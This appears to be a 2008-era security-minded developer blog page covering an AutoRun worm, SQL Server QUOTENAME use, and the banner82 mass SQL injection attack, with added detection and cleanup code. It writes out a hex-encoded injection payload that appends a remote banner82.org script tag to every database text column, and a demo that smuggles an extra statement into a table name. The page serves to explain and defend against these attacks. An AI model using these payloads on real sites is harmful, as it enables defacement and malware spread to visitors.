Suspected Trojan or Virus qxty9be.cmd

Suspected Trojan is messing up my PC at this very moment.

I attached my portable drive to a computer that didn't have antivirus
today. The computer was working fine (at least so it seemed) but I found
a certain "autorun.inf" and "qxty9be.cmd" on that disk afterwards.

I scanned the disk and Symantec didn't see anything! However in my
attempt to learn more about it (thinking I could run the .cmd file
inside a Virtual Machine) I copied it to my local disk.

After copying I couldn't see the file (it was hidden but weirdly
enough I saw it when it was on my portable drive). So I went to Tools
> Folder Options > View > Show hidden files/folders.

That's when Auto-Protect came up. It detected something! But the
Auto-Protect Results window froze. Stupid me tried to scan the folder again,
and Manual Scan froze again.

I didn't know copy/pasting without running could cause some unexpected behavior.

I had the same behavior on another PC earlier and it ended up having
boot problems. If this was indeed the cause then it did something
really serious.

I couldn't find any resource about it on Google except one, but with no resolution whatsoever, and it was posted yesterday or something.

Symantec's Auto-Protect Results and Manual Scan windows are still hanging
at this point actually. So it feels like this is a goodbye letter, as I
expect something bad to happen once I restart (similar to what
happened earlier).

So this is just a warning; wish me luck (I have backups for sure, but still, things are never gonna be the same again…)

UPDATE

Just restarted, but unlike the other machine, this one survived. Thanks to the following:

1) ZoneAlarm (the OSFirewall feature, I think) – it prompted whether to allow the *.cmd to run or not (of course I denied it)

2) Spybot Search & Destroy – scanned and detected the Trojan as Win32.Ruju.a, but only God (and the creator) knows what else it does

3) Acronis True Image backup – did a backup even during the time that Symantec was freezing (it might end up as a corrupted backup, but it's trivial to back up so I did it anyway). Plus my previous backup gave me the confidence that, worst comes to worst, I have one

4) Symantec for Auto-Protect. Not for protecting me, but at least for detecting the problem despite freezing. The Trojan still managed to get through. I'm certain of this because clicking on my other drives was running the *.cmd file, and Spybot affirms that the Trojan made its way in. I also did a manual scan on the portable drive before this erupted and it didn't detect it. What's wrong, Symantec? (I have v10)

Hope that would be the last of it. Gotta get back to work

UPDATE 2

* This worm is generally transmitted via the AutoRun feature, so it's always best to turn that feature off. Group Policy Editor (Start > Run > gpedit.msc > User Configuration > Administrative Templates > System > Turn Off Autoplay should be set to Enabled)

* Furthermore, here's more detailed information about the issue: http://www.threatexpert.com/report.aspx?md5=e24a0458c2ef5333b06be67c7ea47b95

Will keep updating this as necessary. Let's make the world a safer place…
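Since the infection vector in this post is AutoRun, here is an added example (my own code, not part of the original post) that parses an autorun.inf the way a scanner would and reports which file Windows would launch on insert or double-click. The sample autorun.inf below is constructed to mirror the autorun.inf/qxty9be.cmd pairing described above; the real file's contents are not on this page, so the layout is only the common one.

```python
import os
import re
from typing import Dict, List, Tuple

# Extensions that mean "run a program" rather than "open a document".
EXECUTABLE_EXTS = {".exe", ".com", ".cmd", ".bat", ".pif", ".scr", ".vbs", ".js", ".wsf", ".hta"}

# Constructed sample modelled on the autorun.inf / qxty9be.cmd pairing from the post
# above (the real file's contents are not known; this only mirrors the usual layout).
SAMPLE_AUTORUN_INF = """[AutoRun]
open=qxty9be.cmd
shell\\open\\Command=qxty9be.cmd
shell\\explore\\command=qxty9be.cmd
shellexecute=qxty9be.cmd
icon=%SystemRoot%\\system32\\shell32.dll,4
"""

# [autorun] and variants such as [autorun.x86] are all honoured by Explorer.
SECTION_RE = re.compile(r"^\[\s*autorun(\.[^\]]*)?\s*\]$", re.IGNORECASE)


def parse_autorun(text: str) -> Dict[str, str]:
    """Return key=value pairs from the [autorun] section with keys lower-cased.

    Deliberately lenient (no configparser): worm-dropped files often mix in junk
    lines, odd casing and backslashes in key names, and we want to see what
    Explorer would act on rather than fail on a malformed line.
    """
    entries: Dict[str, str] = {}
    in_section = False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        if line.startswith("["):
            in_section = bool(SECTION_RE.match(line))
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            entries[key.strip().lower()] = value.strip()
    return entries


def launch_targets(text: str) -> List[Tuple[str, str]]:
    """Return (key, command) pairs that would execute something on insert or double-click."""
    targets = []
    for key, value in parse_autorun(text).items():
        if key in ("open", "shellexecute") or (key.startswith("shell\\") and key.endswith("\\command")):
            targets.append((key, value))
    return targets


def is_suspicious(text: str) -> bool:
    """True if any launch target points at an executable or script rather than a document."""
    for _key, command in launch_targets(text):
        tokens = command.split()
        program = tokens[0].strip('"') if tokens else ""
        if os.path.splitext(program)[1].lower() in EXECUTABLE_EXTS:
            return True
    return False


def scan_drive_root(root: str) -> Dict[str, object]:
    """Read <root>\\autorun.inf if present and report what it would run (for use on a live drive)."""
    path = os.path.join(root, "autorun.inf")
    if not os.path.isfile(path):
        return {"path": path, "present": False}
    with open(path, "r", encoding="latin-1", errors="replace") as fh:
        text = fh.read()
    return {"path": path, "present": True, "targets": launch_targets(text), "suspicious": is_suspicious(text)}


if __name__ == "__main__":
    for key, cmd in launch_targets(SAMPLE_AUTORUN_INF):
        print(f"{key} -> {cmd}")
    print("suspicious:", is_suspicious(SAMPLE_AUTORUN_INF))
```

Run it with `scan_drive_root("E:\\")` on a freshly attached drive before opening it in Explorer. The Group Policy setting from UPDATE 2 ends up as the NoDriveTypeAutoRun value under HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer (0xFF disables AutoRun for every drive type), which is the value to check on a machine where you cannot open gpedit.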

WindowsPrincipal.IsInRole doesn’t reflect changes until restart

Just an observation from some time ago: if you create a new Windows role (local group), add a user to it and create a WindowsPrincipal for that user, the IsInRole method doesn't reflect the membership change until a restart is made.

For example, given the code below (Console Application project)

using System;
using System.Collections.Generic;
using System.Text;
using System.Security.Principal;

namespace WindowsPrincipalTest
{
    class Program
    {
        static void Main(string[] args)
        {
            // GetCurrent() wraps the access token of the running process; the group SIDs
            // in that token were fixed when the logon session that started this process was created.
            WindowsIdentity ident = WindowsIdentity.GetCurrent();
            WindowsPrincipal principal = new WindowsPrincipal(ident);

            Console.WriteLine("IsAdmin = " + principal.IsInRole(WindowsBuiltInRole.Administrator));
            Console.WriteLine("IsCustomRole = " + principal.IsInRole("CustomRole"));
            Console.ReadKey();
        }
    }
}

Assuming that you have no CustomRole when executing this code for the first time, the output shows IsCustomRole = False (IsAdmin = True or False depending on the account you run under).

Then create a role named "CustomRole" (if not yet present) then add yourself (or the user which you will use to execute the sample code) as a member of that role.

I usually do this using the Computer Management MMC (Start > Settings > Control Panel > Administrative Tools, or Start > Run > compmgmt.msc > OK) > System Tools > Local Users and Groups node.

After which, execute the code/application again and you should see the same output as above: IsCustomRole is still False.

You'll notice that the membership change is not reflected until the user logs on again (a restart forces that; logging off and back on is enough). Windows evaluates group membership into the user's access token when the logon session is created, and WindowsIdentity.GetCurrent() reads the token of the running process rather than the current group list, so a process started under the old logon session never sees the new group. (** just a reminder to make sure you save documents before restarting)

Lost Internet Access due to ZoneAlarm and Microsoft Update KB951748

I ran into this issue a while ago: I lost my internet connection after installing a Windows update, and it turned out to be because of my ZoneAlarm installation.

Overview:
Microsoft Update KB951748 is known to cause loss of internet access for ZoneAlarm users on Windows XP/2000. Windows Vista users are not affected.

Impact :
Sudden loss of internet access

Platforms Affected :
ZoneAlarm Free, ZoneAlarm Pro, ZoneAlarm AntiVirus, ZoneAlarm Anti-Spyware, and ZoneAlarm Security Suite

Resolution: basically

1) Download and install the latest ZoneAlarm version

2) Set the ZoneAlarm Firewall Internet Zone security level to Medium

3) Uninstall the Windows update (KB951748)

Read the full article (posted July 8, 2008) here.

There is also mention in the forums of uninstalling and reinstalling ZoneAlarm, but also a warning that removing the update leaves you exposed to the vulnerability it was meant to fix. KB951748 is the MS08-037 DNS spoofing fix (it randomizes the source ports of DNS queries, which is what the ZoneAlarm firewall was blocking), so of the three options above, uninstalling the update should be the last resort.

 

The Microsoft Source Code Analyzer for SQL Injection tool

Microsoft has released the Microsoft Source Code Analyzer for SQL Injection tool, a static analyzer for classic ASP code that finds SQL injection vulnerabilities.

The Microsoft Source Code Analyzer for SQL Injection tool is a static code analysis tool that helps you find SQL injection vulnerabilities in Active Server Pages (ASP) code. This article describes how to use the tool, the warnings that are generated by the tool, and the limitations of the tool. See the tool Readme document for more information.

Note that this is a static source-code analyzer, so it must be run on the machine where the source code resides (preferably not a production box, though since it only reads the source it is non-intrusive).

My Verisign SSL Certificate Application Experience

I do have an idea about SSL, certificates and related security concepts, but in my previous jobs it was someone else (the client's IT) who did the preparation, request and installation of SSL certificates, until lately when I had to do it myself. I also had experience with trial and self-signed certificates, but still some things are not the same, of course (including the risk of messing something up).

It's not as difficult as it sounds, but I want to share a few things.

For those not so familiar with SSL, I would suggest Google or Wikipedia, but since providers are working their best to get the highest rank in search engines you might not get the best explanations, and the Wikipedia one seems too technical, so the following article might help: What is SSL and what are certificates (I used Google to search for it too, so there could be better ones). Here's something from Verisign too: Secure Sockets Layer.

With that out of the way the first step would be to generate a Certificate Signing Request (CSR) that will be used to apply to Verisign.

For CSR generation, go to the following link and select your server : Verisign : Generating a CSR request. In my case it was IIS 6.0 on Windows Server 2003.

Since the site had an existing certificate with another provider (not Verisign), I figured it wouldn't matter if I generated a renewal request (an option in the IIS Server Certificates wizard) despite the new provider, since it is the private key that matters and it's still on the machine. So I generated the renewal request, initiated the registration, submitted the CSR (copy-pasted into their application wizard) and payment was successful.

Now here's my first issue. Verisign wouldn't/couldn't process the application because the common name (CN) inside the CSR does not match the company registered as the owner of the domain we are trying to secure the certificate for. Note that this was not an issue with the previous provider, but Verisign is more particular about this (which is a good thing). So remember, the CN for the request must match the owner name registered for the domain. If that is not the case then they do offer the following options:

1) Update the registrant/owner information in the domain register to match the CN

2) Generate a new request with the matching CN and registrant

3) A domain authorization letter that must be signed by the domain registrant or the employee of the domain registrant (and NOT the organizational contact in the request).

So moving forward, our best option was option 2.

Now, you can't create a new request without removing the old attached certificate. Problem. But not for long, because Microsoft has a work-around in the following link: Renew/Create CSR while another certificate is still installed. Note that the title mentions Renew, but here is how I did it. If you'd notice, the article applies to IIS 5.0, and IIS 6.0 seems to have added the feature that you can renew without going through the work-around; that is, generating a renewal CSR wouldn't require that you remove the existing certificate. Since I needed to create a new CSR I did what was in the article. I had another existing unused website (note: website and not virtual directory) on that IIS, so I didn't need to create a new website. I used that to generate the CSR and applied to Verisign again.

Took some time and a number of follow-ups before they got back to us saying they couldn't verify the technical telephone contact: they couldn't find a publicly verifiable number for our client. So either:

1) A faxed copy of a recent telephone bill showing the Organization Name and telephone number

2) A notarized letter signed by the Organizational contact authorizing the technical contact to request/apply for the product/certificate.

The technical and organizational contact were the same in our case, but we sent a notarized letter nevertheless. Hopeful, but it turned out that they won't accept a faxed copy of the letter with an embossed notary seal. They suggested shading the seal; we resent it via fax and email, but no luck. The seal was local and not from the US and not so legible even on the hard copy, so since they insisted, we had a new one created.

After all the hassle, the request was finally approved. Signed in to Verisign Certificate Center (you'd have the details from when you registered the first time) and downloaded the keys. Got the PKCS#7 certificate (with the intermediate certificate authorities – CA) since it was the common one and it says unless you know what you need, use PKCS. And knowing that it had the intermediate CA information, I went for it. Otherwise, if you installed it incorrectly without the intermediate CA when you needed it, the certificate would appear as invalid to the browser.

Saved the content of the certificate in a *.cer file. Continued the work-around steps from the Microsoft link earlier, that is, processed the pending request on the temporary (the other unused) website; the certificate was installed only to be removed afterwards. Note that this is the trick: the certificate was disassociated from the other website, but it was installed and the record remains on the machine for use in another website. So went to the production website > Properties > Directory Security > Server Certificate > Replace certificate > find the certificate installed a while ago (take note of the serial number, or the name if it's obvious), replace, and finally you're good to go. Verify the certificate by accessing the site from your browser (from another machine, not from the same server). Read the article again for more detailed instructions if you're not that familiar yet.

Verisign costs more than others, but I'd still go for it if I/the client can afford it, despite this experience. But I would highly suggest that if you have to renew a certificate, especially if moving providers, make sure you do it well before the existing certificate's expiration (~ a month) to cover unexpected issues.

And we're done. Gotta sleep. 🙂

Privacy in sending email to mailing list (BCC)

I think most people should know this already although I'm not quite sure about that so posting anyways.

More often than not I receive emails sent to mailing lists where the individual recipients don't really know each other, or even if they do, they might not necessarily want the other recipients to have their email address. I personally don't really mind disclosing my information (having my blog and numerous online profiles would easily help you figure out my email), but there is a very high possibility that others would mind, and unless you are absolutely sure that they don't, use BCC (blind carbon copy) for those recipients instead.

Don't get me wrong, this is a free world and do as you please, but your recipients will likely appreciate proper use of the BCC field, not to mention that it would minimize spam. In its own little way it makes the web and the world a safer place. We need not worry about black hat hackers employing complicated techniques to look into email address databases or gain access to a server if they need only compromise a few email accounts, and if those accounts happen to be full of valid mailing list emails, then they're in for a treat. We don't really want that, do we? 🙂

In the context of e-mail, blind carbon copy (abbreviated BCC and sometimes referred to as Blind Courtesy Copy) refers to the practice of sending a message to multiple recipients in such a way that what they receive does not contain the complete list of recipients…

Read the full article about BCC on Wikipedia.

Browsing Security with NoScript

While working (or actually just playing around) with the infamous SQL injection attacks seen around lately, I think it is worth mentioning that as a developer, your browser's and your own PC's security is as important as securing your web servers and databases.

Since some (most) of the variants involve a JavaScript file which in turn creates an iframe which communicates with another server to serve whatever malicious things they want to happen in the background (I didn't really bother finding out what it was doing, rather just how to help get rid of or prevent them), I think it is worth mentioning that simply opening those compromised pages could break your own browser or machine too, and even make you an accomplice in their deeds. Since it's not uncommon for developers to be developing using admin accounts, we are more susceptible than typical non-power users **. That's where NoScript for Firefox comes in. There are lots of reviews and arguments on Firefox versus IE security, but I find it hard to block JavaScript in IE, and besides I've been very satisfied with Firefox and NoScript (though my doors are never open).

For those of you who haven't heard of NoScript before, it's a Firefox add-on which allows you to allow or deny, permanently or temporarily, JavaScript/Java/Flash among other objects for the web sites that you open. It can be found at the following link: NoScript homepage. It's developed by Giorgio Maone, who, if I may say, is doing a good job in continually improving it (new releases come out very often).

So there, do yourself and the world a favor and read about your browser's security, and at least know how to filter JavaScript. Every browser that is a little more secure is a step towards a safer web.

** Yes, I know, the no-admin and least-privilege stuff – but let's face it, not everyone has been successful in completely following those. I'm guilty of this, but I'm getting there, plus not to mention that's what my purchased Acronis True Image is for 🙂 Hopefully more posts on this topic next time.

sp_executesql error with DDL statements (preventing SQL injection)

One of the requirements for an application I'm currently working on is for the end user of a web application/site to be able to create objects in the database.

There are a number of objects that must be created or manipulated, but for the sake of simplicity let's take for example creating a table with one column. The SQL statement would look like:

CREATE TABLE [MyTable]
( [MyColumn] INT NOT NULL )

To minimize SQL injection, I was hoping I could use the sp_executesql stored procedure to come up with a parameterized query (in addition to other preventive measures like validating input). Something like:

DECLARE @SQLString NVARCHAR(MAX);
DECLARE @ParamDefinition NVARCHAR(256);

SET @SQLString = N'CREATE TABLE @TableName (@ColumnName INT NOT NULL)';
SET @ParamDefinition = N'@TableName VARCHAR(128), @ColumnName VARCHAR(128)';

EXECUTE sp_executesql
  @SQLString,
  @ParamDefinition,
  @TableName = 'MyTable',
  @ColumnName = 'MyColumn';

When I executed the statement it returned the error "Incorrect syntax near '@TableName'". Though I hadn't worked with sp_executesql for Data Definition Language (DDL) statements, I have been using it for Data Manipulation Language (DML) statements such as conditional selects and others, so I'm quite sure there is nothing wrong with the syntax near @TableName by itself. What could be wrong?

It turns out that sp_executesql parameters can only stand in for data values (the literals in a statement), never for identifiers such as table or column names; the statement text must already contain the object names when it is compiled. That is not specific to DDL (you cannot parameterize the table name in a SELECT either), but with CREATE TABLE the identifier is the whole point, so the parameterized form above is unsupported.

So in this particular case there is no parameter slot to put the names in, and you are forced back to concatenation to build the SQL statement dynamically, which is exactly where the SQL injection risk comes from:

DECLARE @SQLString NVARCHAR(MAX)
DECLARE @TableName VARCHAR(128)
DECLARE @ColumnName VARCHAR(128)
SET @TableName = 'MyTable'
SET @ColumnName = 'MyColumn'
SET @SQLString = 'CREATE TABLE ' + @TableName + '( ' + @ColumnName + ' INT NOT NULL)'
EXEC (@SQLString)

But wait, there is something else you can do to prevent SQL injection, so all is not hopeless. Meet QUOTENAME. As you might have noticed before, one way to create a table with spaces in the name is using quotes or brackets, like CREATE TABLE [hello world how are you]. Anything between the delimiters (e.g. quotes, brackets) is considered part of the table name rather than a command/statement.

When you experiment more you will notice that the following statement creates a table named as indicated instead of throwing an error or doing something messy:

CREATE TABLE [Hello; Drop Master; ] ( [MyColumn] INT NOT NULL)

Yes I know that's a very clever sql injection attempt
but here's another example:

DECLARE @SQLString NVARCHAR(MAX)
DECLARE @TableName VARCHAR(128)
DECLARE @ColumnName VARCHAR(128)
-- The "table name" closes the CREATE TABLE, adds a statement of its own and comments out the rest
SET @TableName = 'MyTable (ColA INT NULL); PRINT ''HELLO''; -- '
SET @ColumnName = 'MyColumn'
SET @SQLString = 'CREATE TABLE ' + @TableName + '( ' + @ColumnName + ' INT NOT NULL)'
PRINT @SQLString
EXEC (@SQLString)

Try executing that against a test database and, along with the table named MyTable being created, you will see HELLO printed in the output/messages window. If you replace the PRINT statement with something more malicious such as DROP DATABASE master, and you happen to be running under a highly privileged account, then you're in trouble.

But try the statement again, this time using this @SQLString:

SET @SQLString = 'CREATE TABLE ' + QUOTENAME(@TableName) + '( ' + QUOTENAME(@ColumnName) + ' INT NOT NULL)'

As you might have expected, you get a table named [MyTable (ColA INT NULL); PRINT 'HELLO'; -- ] instead of HELLO being printed. Should there be a ']' in your variable value, QUOTENAME doubles it to ']]' (a '[' is left alone, since only the closing delimiter can end the name), just like single quotes are doubled when you use QUOTENAME(@s, '''') for string literals, so the value can never break out of the delimiters.

Now that seems a lot better.

So in addition to other ways of protecting your database such as (but not limited to) validating input (very well), running SQL Server under a least-privileged account, and using stored procedures (along with determining proper parameter data types and lengths), when faced with the need to perform dynamic queries where you cannot use sp_executesql parameters, as in this case with DDL statements, see if QUOTENAME would be applicable and if it would help.

** note that QUOTENAME('dbo.Employee') will not result in [dbo].[Employee] but rather [dbo.Employee], so for fully qualified names quote the server/database/schema and table names separately and join them with dots. Also, QUOTENAME takes a sysname (128 characters): for longer input it returns NULL, which silently turns the whole concatenated string into NULL and EXEC(NULL) does nothing, so check the length (or the result for NULL) before you EXEC.

SQL injection attacks – banner82 script


UPDATE (6/19/2008): For both IT people and end users, please spend time reading through this (if not here then at least on other sites; just be sure you are aware nevertheless) if you aren't that aware yet, since this exploit has been continually spreading despite numerous warnings already made on the web. For developers, please feel free to comment, add or correct any information you think would further benefit others. For end users, I would still recommend knowing more about this issue, how to protect yourself and how to stop yourself from being part of spreading it. The following section might be of interest to you: browser and anti-spy software.

UPDATE (6/27/2008): Came across Scrawlr, an SQL injection detection tool from HP that is available for free. There probably are other (better) tools available, but this is the one I ran into so far. Also, a tool named UrlScan from Microsoft TechNet was suggested by Jax (see comments). It can be used to screen/limit the request information being sent to your site, the same way that http.sys does for IIS 6 or later. You may want to have a look.

There seem to be a number of SQL injection attacks happening lately that involve adding <script tags pointing at banner82.org/b.js, adword71.com/b.js (and the like) to entries in string/text/varchar columns in the database, targeting ASP (classic/3.0) sites and SQL Server. Note that they need not know your table or column names to mess with you: the injected script enumerates them from sysobjects/syscolumns.

I definitely do not wish to play cops and robbers here, but I wish to contribute a little on this. There are a number of articles on this (read along) and even more on preventing/cleaning SQL injection and other related exploits such as cross-site scripting, so help yourself. 😀

It generally works by appending a string (a URL-encoded SQL script) to the URL/query string. When it reaches the server, the string is URL-decoded automatically, and if the target site/application is susceptible to SQL injection (generally because it concatenates request values into a dynamically built SQL query) then the passed SQL script is executed against the database and appends the <script> text to string/text fields. This is not limited to INSERT/UPDATE operations: a value used in a SELECT is just as exploitable, because the injected text closes the original statement and adds its own (i.e. even if your site/application only issues SELECT queries, it is still vulnerable if it is not coded to prevent this).

I'm almost sure other variants will pop up here and there (those who did this are, IMHO, brilliant, which doesn't change the fact that what they're doing is wrong), but I think being aware is more than a good start.
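To make the mechanism described above concrete, here is an added example (my own code, not from the original post and not the attack's script) that does the server-side decoding step the attacker relies on, in reverse: it URL-decodes a request's query string, pulls the hex literal out of the CAST(0x... AS NVARCHAR) wrapper these automated attacks used to hide the real script from keyword filters, and flags the indicators. The attack request and the hidden script are constructed to match the shape described on this page (a cursor over sysobjects/syscolumns that appends a <script> tag to every text column); banner82.org is the host the post names.

```python
import re
from typing import Dict, List
from urllib.parse import unquote_plus

# Tokens that have no business in a product-id or page-number parameter.
INDICATORS = ("declare ", "cast(", "exec(", "cursor", "sysobjects", "syscolumns", "<script")

# CAST(0x... AS VARCHAR(...)) or CAST(0x... AS NVARCHAR(...)); group 2 is the optional N.
CAST_RE = re.compile(r"cast\(\s*0x([0-9a-f]+)\s+as\s+(n?)varchar", re.IGNORECASE)


def decode_cast_payloads(sql_text: str) -> List[str]:
    """Return the plaintext hidden inside each CAST(0x<hex> AS [N]VARCHAR) expression."""
    hidden = []
    for match in CAST_RE.finditer(sql_text):
        raw = bytes.fromhex(match.group(1))
        # NVARCHAR literals are UTF-16LE; VARCHAR literals are single-byte.
        hidden.append(raw.decode("utf-16-le" if match.group(2) else "latin-1"))
    return hidden


def analyze_request(query_string: str) -> Dict[str, object]:
    """URL-decode a query string as the server would, unwrap hex payloads and report indicators."""
    decoded = unquote_plus(query_string)
    hidden = decode_cast_payloads(decoded)
    haystack = (decoded + "\n" + "\n".join(hidden)).lower()
    found = [token for token in INDICATORS if token in haystack]
    return {"decoded": decoded, "hidden_sql": hidden, "indicators": found, "suspicious": bool(found)}


# ---- constructed samples (not captured traffic) -------------------------------
# The script the attacker wants executed: the cursor over sysobjects/syscolumns
# described in this post, appending a <script> tag to every text column.
HIDDEN_SCRIPT = (
    "DECLARE @T VARCHAR(255),@C VARCHAR(255) "
    "DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b "
    "WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=99 OR b.xtype=35 OR b.xtype=231 OR b.xtype=167) "
    "OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN "
    "EXEC('UPDATE ['+@T+'] SET ['+@C+']=RTRIM(CONVERT(VARCHAR(4000),['+@C+']))"
    "+''<script src=http://banner82.org/b.js></script>''') "
    "FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor"
)
# In a real log only the hex literal is visible; here it is generated from the plaintext above.
HEX_PAYLOAD = HIDDEN_SCRIPT.encode("utf-16-le").hex().upper()
ATTACK_QUERY = (
    "id=42;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x" + HEX_PAYLOAD
    + "%20AS%20NVARCHAR(4000));EXEC(@S);--"
)
BENIGN_QUERY = "id=42&page=2&sort=name"


if __name__ == "__main__":
    report = analyze_request(ATTACK_QUERY)
    print("suspicious:", report["suspicious"], "indicators:", report["indicators"])
    print("hidden SQL:", report["hidden_sql"][0][:80], "...")
```

Point it at the query-string column of your IIS logs to find out whether you were hit, and note why a keyword blacklist on the raw request alone is weak: the words it looks for are inside the hex literal, so the filter has to decode the CAST wrapper first, as analyze_request does.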

Here is more information on the issue and an SQL script to help cleanse the affected data. You can run it against your SQL Server database as it is, but I would recommend you seek the help of at least a developer with SQL knowledge. Also please feel free to drop me a message/email if necessary. I'd be glad to help any way I can.

/*
NOTE: this is a patch created only by reversing the effect of the SQL script
in one known variant of the exploit. This is not tested as a generic RemoveText stored procedure.

Also use with caution as this procedure will remove the text specified without further checks
as to whether it is indeed an exploit or valid data. (eg. you are applying this to a forum
database which may contain valid entries with the <script string/text… they will be removed unconditionally)

Always back up your database before any patches, and verify data after the patch.
There is also no guarantee that this will completely remove the unwanted text if the variant
used for the exploit uses another approach (such as those involving NTEXT, TEXT columns).

Finally, this is only to cleanse already compromised data and doesn't prevent SQL injection.
There are many articles doing that already but to point out a few, please check these links
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23411125.html
http://www.experts-exchange.com/Security/Vulnerabilities/Q_23408074.html

Solutions could involve (short and long term):
1. changes in code to validate input (deny request variables with blacklisted keywords)
2. this (cleansing of data)
3. reduce access of the database user account to only what is necessary to perform what's needed. See the DENY keyword in SQL.

    – generally DENY access to system tables, views, procedures et al. and allow only
      access to user-defined objects. For this particular variant, DENY access to the sysobjects and
      syscolumns tables in SQL 2000 (views in SQL 2005), but the more system/unused objects that
      need not be accessed directly you can lock down, the better.
    – this might take time to properly test which need to be allowed and thus might require
      testing the whole site again (regression testing), but in typical applications restricting access
      to system objects would not be a problem and is a good idea.
4. more input validation (length validation, data type validation etc.)
5. use stored procedures or parameterized queries (if there is really a need to concatenate, quote the identifiers)
6. auditing, logging and maybe maintaining a blacklist of IPs
7. just a reminder, make sure the web server and database server are secured, of course
8. subscribe to HackerSafe or similar services

also don't fail to encrypt critical/sensitive information in the database

There are more comprehensive articles on the web, so please take some time to research and
don't just take my word for it.

Hope this helps.

*/

IF EXISTS (
  SELECT * FROM dbo.sysobjects
    WHERE id = OBJECT_ID(N'[dbo].[RemoveText]')
      AND type IN (N'P', N'PC'))
  DROP PROCEDURE [dbo].[RemoveText]
GO

CREATE PROC RemoveText
(
  @TextToRemove VARCHAR(4000)
)
AS

DECLARE @T VARCHAR(255),
        @C VARCHAR(255)

-- Every column of every user table (xtype 'u') of type ntext (99), text (35),
-- nvarchar (231) or varchar (167): the same column set the exploit's own script walks.
DECLARE Table_Cursor CURSOR FOR
  SELECT a.name, b.name
  FROM sysobjects a, syscolumns b
  WHERE a.id = b.id
    AND a.xtype = 'u'
    AND (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167)

OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T, @C

WHILE (@@FETCH_STATUS = 0)
BEGIN
  -- Object names come from the catalog, but quote them anyway, and double any single
  -- quote in @TextToRemove so it survives being embedded in the dynamic statement.
  -- NOTE: CONVERT(VARCHAR(4000), ...) truncates text/ntext values longer than 4000 characters.
  EXEC(
    'UPDATE ' + QUOTENAME(@T) + ' SET ' + QUOTENAME(@C) + ' = REPLACE(CONVERT(VARCHAR(4000), '
    + QUOTENAME(@C) + '), ''' + REPLACE(@TextToRemove, '''', '''''') + ''', '''')')
  FETCH NEXT FROM Table_Cursor INTO @T, @C
END

CLOSE Table_Cursor
DEALLOCATE Table_Cursor
GO

/*
Sample usage (see below). Replace the script path accordingly: there are variants that use a
different .js path (like banner82.com or adword71 et al).
*/

EXEC RemoveText '<script src=[x]></script>'
-- WHERE [x] is the URL/link to the .js and may vary depending on what hit your site

UPDATE (6/19/2008) I would highly recommend securing your browsers using JavaScript/Java/Flash etc. blockers, with adware and spyware protection in place. I had a recent post about Firefox and NoScript at the following link: Browsing Security with NoScript. Being able to block JavaScript is significant. There are only a small number of domains/sites that the add-on recognizes in its whitelist, so even JavaScript from the site itself is blocked (you can allow it easily), let alone hidden JavaScript from 3rd-party sites (such as what is seen in this exploit).

Also look into anti-spyware products like Spybot Search & Destroy, which would prevent you from accessing known blacklisted domains, among other things. It updates automatically, but if you "immunize" often, you're increasing the chances of not running into a malicious site. Others include the free Windows Defender for genuine Windows users and Ad-Aware, which offers real-time protection (though I haven't been very successful with this one), and it might also be time to look into getting a personal firewall such as ZoneAlarm Personal Firewall; you might even want to get the professional edition for added protection.

Other References:

MUST READ: SQL Injection from Microsoft Security Vulnerability Research and Defense Blog

MUST READ: Security Development Lifecycle post on SQL injection (Michael Howard)

Information on these automated attacks from SANS Internet Storm Center


ZDNet on Fast-Fluxing SQL injection attacks executed from the Asprox botnet (directly related to this exploit)

Filtering SQL injection from Classic ASP – (** restricting access to the objects being exploit such as sysobjects/syscolumns seems like the quickest solution but feel free to explore this too – note though that IMHO this will have a performance hit on your site)

A more generic Search and Replace script

Link: Recent SQL Injection Attacks

I figured this would be a good reminder. I've known some people who thought that just because they create client-side validators and use stored procedures they are no longer vulnerable to SQL injection attacks. Read the full article from the link below; it also contains links on how to protect yourself from such attacks.

You may have seen recent reports that have surfaced stating that web sites running on Microsoft’s Internet Information Services (IIS) 6.0 have been compromised. These reports allude to a possible vulnerability in IIS or issues related to Security Advisory 951306 which was released last week.

Full article : SQL Injection Attacks on IIS Web Servers – BillS IIS Blog